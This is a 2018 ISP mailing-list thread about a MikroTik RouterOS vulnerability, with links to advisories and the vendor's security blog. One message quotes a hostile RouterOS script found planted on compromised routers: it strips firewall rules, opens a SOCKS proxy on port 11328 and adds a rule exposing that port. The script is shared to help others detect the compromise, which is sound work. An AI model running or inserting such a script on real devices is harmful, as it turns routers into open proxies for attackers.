MikroTik recently set up a blog specifically for breaking security issues, with an RSS feed. I highly recommend subscribing.
https://blog.mikrotik.com/ > On Aug 7, 2018, at 6:45 AM, Brian Vargyas via Mikrotik-users > <mikrotik-users@wispa.org> wrote: > > Mikrotik themselves also has published several security bulletins on their > newsletter list. If your not on it, go to mikrotik.com > <http://mikrotik.com/> and scroll to the bottom and sign up for the > newsletter. > > Brian > > > From: 20153514200n behalf of > Sent: Tuesday, August 7, 2018 8:34 AM > To: Dennis Burgess; Mikrotik Users > Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 > > How does one subscribe to your news letter? > Alex Phillips > CEO and General Manager > RBNS.net > HighSpeedLink.net > 540-908-3993 > > > > On Tue, Aug 7, 2018 at 9:29 AM Dennis Burgess via Mikrotik-users > <mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>> wrote: > You should subscribe to our newsletters as we mentioned this several weeks > ago…. This is the exploit that was fixed back 4 months ago! Lol > > > > > > Dennis Burgess, Mikrotik Certified Trainer > > Author of "Learn RouterOS- Second Edition” > > Link Technologies, Inc -- Mikrotik & WISP Support Services > > Office: 314-735-0270 Website: http://www.linktechs.net > <http://www.linktechs.net/> > Create Wireless Coverage’s with www.towercoverage.com > <http://www.towercoverage.com/> > > > From: mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Bruce Bridegwater via > Mikrotik-users > Sent: Sunday, August 5, 2018 8:16 PM > To: 'Shawn C. Peppers' <videodirectwispal...@gmail.com > <mailto:videodirectwispal...@gmail.com>>; 'Mikrotik Users' > <mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>>; Bob Pensworth > <beeper.bo...@gmail.com <mailto:beeper.bo...@gmail.com>> > Cc: JP Douros <jdou...@rpmcable.com <mailto:jdou...@rpmcable.com>> > Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 > > > > Fyi, credit to J.P. Douros from RPM Provioning Management for bringing it to > our attention and providing the solution. > > RPM manages our Cisco UBR10k CMTS. > > Great support company. > > From: mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org>> on behalf of Bob Pensworth via > Mikrotik-users <mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>> > Sent: Sunday, August 5, 2018 7:57:53 PM > To: 'Shawn C. Peppers'; 'Mikrotik Users' > Subject: Re: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 > > > > We are finding an IP/Socks connection: > > We are finding an event entry in System/Scheduler > > And the (below) script in System/Script: > > > > /ip firewall filter remove [/ip firewall filter find where comment ~ "port > [0-9]*"];/ip socks set enabled=yes port=11328 max-connections=255 > connection-idle-timeout=60;/ip socks access remove [/ip socks access > find];/ip firewall filter add chain=input protocol=tcp port=11328 > action=accept comment="port 11328";/ip firewall filter move [/ip firewall > filter find comment="port 11328"] 1; > > > > -- > > Bob Pensworth, WA7BOB | General Manager > > CresComm WiFi, LLC <http://www.crescommwifi.com/> | (360) 928-0000, x1 > > > > From: mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org> <mikrotik-users-boun...@wispa.org > <mailto:mikrotik-users-boun...@wispa.org>> On Behalf Of Shawn C. Peppers via > Mikrotik-users > Sent: Friday, March 16, 2018 11:54 AM > To: mikrotik-users@wispa.org <mailto:mikrotik-users@wispa.org>; > memb...@wisp.org <mailto:memb...@wisp.org> > Subject: [Mikrotik Users] Exploit in ROS 6.41.3/6.42rc27 > > > > I have not tested this yet but.... > > > > https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow > <https://www.coresecurity.com/advisories/mikrotik-routeros-smb-buffer-overflow> > :: // Shawn Peppers > > :: // DirectlinkAdmin.com > <http://directlinkadmin.com/>_______________________________________________ > Mikrotik-users mailing list > Mikrotik-users@wispa.org <mailto:Mikrotik-users@wispa.org> > http://lists.wispa.org/mailman/listinfo/mikrotik-users > <http://lists.wispa.org/mailman/listinfo/mikrotik-users> > _______________________________________________ > Mikrotik-users mailing list > Mikrotik-users@wispa.org > http://lists.wispa.org/mailman/listinfo/mikrotik-users -- Grand Avenue Broadband -- Wireless Internet Service Circle City to Wickenburg and surrounding areas http://grandavebb.com
_______________________________________________ Mikrotik-users mailing list Mikrotik-users@wispa.org http://lists.wispa.org/mailman/listinfo/mikrotik-users
